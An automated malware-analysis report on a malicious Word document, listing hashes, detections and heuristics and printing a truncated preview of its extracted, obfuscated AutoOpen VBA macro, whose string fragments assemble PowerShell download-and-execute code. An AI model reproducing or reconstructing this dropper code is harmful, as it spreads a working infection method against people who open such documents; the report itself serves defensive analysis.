Office (OLE) malware analysis — malicious · 13eaf5f089055876

MALICIOUS

Office (OLE)

140.5 KB Created: 2018-02-13 08:53:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: d7f9255a6f5d2a66bd2b0981d404f6ba SHA-1: 37130b7a19d70c1e1966a1afbc9ed4ab1d070d95 SHA-256: 13eaf5f089055876e7d7e1a387994302bb5d39a42ae1e4dfce6e129a9f0ae421

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro is designed to execute arbitrary code using Shell() and CreateObject, likely to download and run a second-stage payload. The use of obfuscation and the AutoOpen entry point are common tactics for malware droppers.

Heuristics 8

ClamAV: Doc.Dropper.Agent-6447492-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6447492-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30505 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	30505 bytes
SHA-256: `873cbcaceb63aa163550f6e349cc522c64dff0afb89c3df77dda83b8d14430ff`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "HnWiLRvzWSYTXm" Sub AutoOpen() On Error Resume Next YftLNRFJi = bhTj - Sgn(RisjCSKH) - (5569024 - Tan(4764479) / 9242136 - ChrW(iLsamjzYihsGwJ)) IoSEhISfM = wDWCO - Sgn(QmRUawld) - (7917200 - Tan(197943) / 3963796 - ChrW(njqm)) jsKWoYrnf = zhijKzKJQFociK - Sgn(pPj) - (7697530 - Tan(1928765) / 8299455 - ChrW(UJTdrskru)) Application.Run "TmqUtFjcCszPR", lRFoAzZiAJolhs dobwEzFqX = iTkzHJATzJLzVI - Sgn(NUQhFSZY) - (2155105 - Tan(2160808) / 7762456 - ChrW(LzqJ)) pQLMJjMMU = YkijiSTbripJS - Sgn(EuZmSCoVIz) - (4213141 - Tan(6719649) / 1840638 - ChrW(NdIEMNuoqcjVn)) kGLUjzjHP = ZtSDC - Sgn(jNvJYNNWl) - (9340062 - Tan(992118) / 7259568 - ChrW(EzFzOD)) End Sub Function lRFoAzZiAJolhs() On Error Resume Next NtcEtw = UTnjQddO - Sgn(DHtsMv) - (5450727 - Tan(1644272) / 8374277 - ChrW(tiGLBdF)) LHHRBd = mwAVjWTSvtbjd - Sgn(RSNjWZjWbEWXr) - (7587960 - Tan(2683237) / 1567470 - ChrW(FLjrQNhaWYu)) wRmwhrfUG = ijL - Sgn(zQozVHfLPWvz) - (1899906 - Tan(5943621) / 6217311 - ChrW(nIW)) JdFozd = psXqEBNjYGp + Mid(PjLzHYjjRnP + "Sicwlvr+lvrNet.WebClilvr+lvrelvr+lvrnlmCP+mCPvr+lvrt;lvrK4w+K4w+lvr6IolvrmCP+mCP+lvrNSB =lvrhKKCkIUV" + vSDNNrk, 5, 88) SkaXjfqd = qvtPi - Sgn(PHiVtiX) - (7843637 - Tan(5591981) / 7205793 - ChrW(idsYo)) tTipw = cHnwpHIz - Sgn(RNUlz) - (1359987 - Tan(8294550) / 8478450 - ChrW(qCC)) QazYvUA = PusnGiLkhm - Sgn(ZQI) - (9121061 - Tan(3836266) / 5066746 - ChrW(VWk)) JwVib = uEBFfFzBpW + Mid(YLjtWZKPwjYbt + "nZRTNBPbZjRUlI+ lvr+mCP+mCPlvrvlvr+K4w+K4wllFjWIsQFTzIErnwdWzwAwiMB" + hQrsqNa, 15, 29) NSFjnZfm = phjzCkZv - Sgn(jYzpDPE) - (4179022 - Tan(3047946) / 441697 - ChrW(YzuiLc)) QQuVwT = AfCDrMSsEn - Sgn(pIjGjuOauXDHNj) - (8731798 - Tan(1792104) / 227962 - ChrW(mzmaCYPSchmW)) jdiiJftQJA = LQYat - Sgn(SSAUliKzYoU) - (9593919 - Tan(672931) / 3352990 - ChrW(SqK)) JoBRLjA = JTrlCmks + Mid(mUustFBBan + "zoiaBS+lvre8'+'JK4w+K4wlvr+lvr/vRG.Splvr+lvrlit(vRGlvr+lvr?vRGlvr+lmCP+'+'mCPvr);6lvr+lvrIoSDC =lv'+'r+lvr 6Iolvr+lvrenvlK4w+K4wvr+lvr:K4w+KmtiFDjIzkJNIPjOjAFzmcBX" + jbTMjzvY, 7, 135) lEbzKl = inzK - Sgn(EizLwcidfMJWOj) - (9756336 - Tan(6976389) / 1917898 - ChrW(FRBzPbwMzGTDqD)) NUWBNAcjNM = tWJdwlFWhN - Sgn(DpZudU) - (4701977 - Tan(8039743) / 8524795 - ChrW(zFSYOldcJbWFo)) ijnrRn = KpGNLzu - Sgn(mCXHnEc) - (9790807 - Tan(6036693) / 102501 - ChrW(owQqF)) tzTWump = GHqNRhnXL + Mid(qpIzaiYmdBssb + "zYmCcG YJvCP+mCP4wpublK4w+K4wilvr+lvrclvr+lvr K4w+K4wKFGDBkfUGAatJmUmVrZbpjChwFI" + dHjiFKsaNLnbc, 11, 43) XVCqulL = WuAXtwAjLXAwBL - Sgn(HiUokUWS) - (8247203 - Tan(3772135) / 9611712 - ChrW(EaBDvMoUD)) QpsSiPYoXNS = jqp - Sgn(iSVzjR) - (1019642 - Tan(5295839) / 9910005 - ChrW(EKZbzb)) lpiVRWq = EvYwG - Sgn(TFjMq) - (4126076 - Tan(1375828) / 470591 - ChrW(zXqDwtmjV)) RzjjQOMM = AcuXlqwAEkoO + Mid(itzdS + "INJOdGNpTLNbuRvrRGmCP+mCPOXZvRG lK4w+K4wvrmCP+mCP+lvr+lvr+mIBUviZuiLsjlStX" + AHwYzK, 15, 45) InIPju = LClvfPRPD - Sgn(fXUUwzV) - (8736131 - Tan(3071473) / 5046867 - ChrW(iGSvuBpaGX)) osSVVsciHui = ZZZkbZwbKj - Sgn(zsliXA) - (1108657 - Tan(8856675) / 2433638 - ChrW(mrdvSAlOc)) zwcAWzf = zwwzuuLXvwoP - Sgn(TIZ) - (1874533 - Tan(2248584) / 5605866 - ChrW(ULKGnhwpIYLM)) VHQmhqo = amzkmMVcrcv + Mid(QYICsz + "P+lvrK4w+K4wvRlvr+lvrGe-lvr+lvmCP+mCPrIlK4w+K4wvr+lvK4w+K4wrtemvlvr+lvrmCP'+'+mCPRG)(6IoSDC);bmCP+mCPreaK4w+K4wlvrK4w+K4w+lK4w+K4wvrklvr+lvr;}catclvr+lvrh{lvr+lvr}lvr+lvr}lvrK4w+'+'rlYFlzBwIBwnKwbzNWfmAGl" + PGsM, 2, 180) AWNBkz = XlbjKC - Sgn(iVYA) - (9855322 - Tan(7539661) / 2618781 - ChrW(SQrnCQhlbvYfQ)) EpLmK = daiS - Sgn(biMqfGf) - (2802558 - Tan(4078060) / 296891 - ChrW(ojXrYtVKUwp)) wMYzj = AlmXrZrzVjUmPG - Sgn(MhXBMkpGr) - (1616884 - Tan(4767727) / 6162288 - ChrW(ETwTmfLEtjo)) pljIJfUS = rRBvondphwPn + Mid(pJmsqZln + "nMJFTSELQXkpCGFUWqaPcS).REplACe(mCPlZCmCP,mCPt'+'eHmCP).REplACe(mCPx2lmCP,m ... (truncated)

SHA-256: 873cbcaceb63aa163550f6e349cc522c64dff0afb89c3df77dda83b8d14430ff

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HnWiLRvzWSYTXm"
Sub AutoOpen()
On Error Resume Next
YftLNRFJi = bhTj - Sgn(RisjCSKH) - (5569024 - Tan(4764479) / 9242136 - ChrW(iLsamjzYihsGwJ))
IoSEhISfM = wDWCO - Sgn(QmRUawld) - (7917200 - Tan(197943) / 3963796 - ChrW(njqm))
jsKWoYrnf = zhijKzKJQFociK - Sgn(pPj) - (7697530 - Tan(1928765) / 8299455 - ChrW(UJTdrskru))
Application.Run "TmqUtFjcCszPR", lRFoAzZiAJolhs
dobwEzFqX = iTkzHJATzJLzVI - Sgn(NUQhFSZY) - (2155105 - Tan(2160808) / 7762456 - ChrW(LzqJ))
pQLMJjMMU = YkijiSTbripJS - Sgn(EuZmSCoVIz) - (4213141 - Tan(6719649) / 1840638 - ChrW(NdIEMNuoqcjVn))
kGLUjzjHP = ZtSDC - Sgn(jNvJYNNWl) - (9340062 - Tan(992118) / 7259568 - ChrW(EzFzOD))
End Sub
Function lRFoAzZiAJolhs()
On Error Resume Next
NtcEtw = UTnjQddO - Sgn(DHtsMv) - (5450727 - Tan(1644272) / 8374277 - ChrW(tiGLBdF))
LHHRBd = mwAVjWTSvtbjd - Sgn(RSNjWZjWbEWXr) - (7587960 - Tan(2683237) / 1567470 - ChrW(FLjrQNhaWYu))
wRmwhrfUG = ijL - Sgn(zQozVHfLPWvz) - (1899906 - Tan(5943621) / 6217311 - ChrW(nIW))
JdFozd = psXqEBNjYGp + Mid(PjLzHYjjRnP + "Sicwlvr+lvrNet.WebClilvr+lvrelvr+lvrnlmCP+mCPvr+lvrt;lvrK4w+K4w+lvr6IolvrmCP+mCP+lvrNSB =lvrhKKCkIUV" + vSDNNrk, 5, 88)
SkaXjfqd = qvtPi - Sgn(PHiVtiX) - (7843637 - Tan(5591981) / 7205793 - ChrW(idsYo))
tTipw = cHnwpHIz - Sgn(RNUlz) - (1359987 - Tan(8294550) / 8478450 - ChrW(qCC))
QazYvUA = PusnGiLkhm - Sgn(ZQI) - (9121061 - Tan(3836266) / 5066746 - ChrW(VWk))
JwVib = uEBFfFzBpW + Mid(YLjtWZKPwjYbt + "nZRTNBPbZjRUlI+ lvr+mCP+mCPlvrvlvr+K4w+K4wllFjWIsQFTzIErnwdWzwAwiMB" + hQrsqNa, 15, 29)
NSFjnZfm = phjzCkZv - Sgn(jYzpDPE) - (4179022 - Tan(3047946) / 441697 - ChrW(YzuiLc))
QQuVwT = AfCDrMSsEn - Sgn(pIjGjuOauXDHNj) - (8731798 - Tan(1792104) / 227962 - ChrW(mzmaCYPSchmW))
jdiiJftQJA = LQYat - Sgn(SSAUliKzYoU) - (9593919 - Tan(672931) / 3352990 - ChrW(SqK))
JoBRLjA = JTrlCmks + Mid(mUustFBBan + "zoiaBS+lvre8'+'JK4w+K4wlvr+lvr/vRG.Splvr+lvrlit(vRGlvr+lvr?vRGlvr+lmCP+'+'mCPvr);6lvr+lvrIoSDC =lv'+'r+lvr 6Iolvr+lvrenvlK4w+K4wvr+lvr:K4w+KmtiFDjIzkJNIPjOjAFzmcBX" + jbTMjzvY, 7, 135)
lEbzKl = inzK - Sgn(EizLwcidfMJWOj) - (9756336 - Tan(6976389) / 1917898 - ChrW(FRBzPbwMzGTDqD))
NUWBNAcjNM = tWJdwlFWhN - Sgn(DpZudU) - (4701977 - Tan(8039743) / 8524795 - ChrW(zFSYOldcJbWFo))
ijnrRn = KpGNLzu - Sgn(mCXHnEc) - (9790807 - Tan(6036693) / 102501 - ChrW(owQqF))
tzTWump = GHqNRhnXL + Mid(qpIzaiYmdBssb + "zYmCcG YJvCP+mCP4wpublK4w+K4wilvr+lvrclvr+lvr K4w+K4wKFGDBkfUGAatJmUmVrZbpjChwFI" + dHjiFKsaNLnbc, 11, 43)
XVCqulL = WuAXtwAjLXAwBL - Sgn(HiUokUWS) - (8247203 - Tan(3772135) / 9611712 - ChrW(EaBDvMoUD))
QpsSiPYoXNS = jqp - Sgn(iSVzjR) - (1019642 - Tan(5295839) / 9910005 - ChrW(EKZbzb))
lpiVRWq = EvYwG - Sgn(TFjMq) - (4126076 - Tan(1375828) / 470591 - ChrW(zXqDwtmjV))
RzjjQOMM = AcuXlqwAEkoO + Mid(itzdS + "INJOdGNpTLNbuRvrRGmCP+mCPOXZvRG lK4w+K4wvrmCP+mCP+lvr+lvr+mIBUviZuiLsjlStX" + AHwYzK, 15, 45)
InIPju = LClvfPRPD - Sgn(fXUUwzV) - (8736131 - Tan(3071473) / 5046867 - ChrW(iGSvuBpaGX))
osSVVsciHui = ZZZkbZwbKj - Sgn(zsliXA) - (1108657 - Tan(8856675) / 2433638 - ChrW(mrdvSAlOc))
zwcAWzf = zwwzuuLXvwoP - Sgn(TIZ) - (1874533 - Tan(2248584) / 5605866 - ChrW(ULKGnhwpIYLM))
VHQmhqo = amzkmMVcrcv + Mid(QYICsz + "P+lvrK4w+K4wvRlvr+lvrGe-lvr+lvmCP+mCPrIlK4w+K4wvr+lvK4w+K4wrtemvlvr+lvrmCP'+'+mCPRG)(6IoSDC);bmCP+mCPreaK4w+K4wlvrK4w+K4w+lK4w+K4wvrklvr+lvr;}catclvr+lvrh{lvr+lvr}lvr+lvr}lvrK4w+'+'rlYFlzBwIBwnKwbzNWfmAGl" + PGsM, 2, 180)
AWNBkz = XlbjKC - Sgn(iVYA) - (9855322 - Tan(7539661) / 2618781 - ChrW(SQrnCQhlbvYfQ))
EpLmK = daiS - Sgn(biMqfGf) - (2802558 - Tan(4078060) / 296891 - ChrW(ojXrYtVKUwp))
wMYzj = AlmXrZrzVjUmPG - Sgn(MhXBMkpGr) - (1616884 - Tan(4767727) / 6162288 - ChrW(ETwTmfLEtjo))
pljIJfUS = rRBvondphwPn + Mid(pJmsqZln + "nMJFTSELQXkpCGFUWqaPcS).REplACe(mCPlZCmCP,mCPt'+'eHmCP).REplACe(mCPx2lmCP,m
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.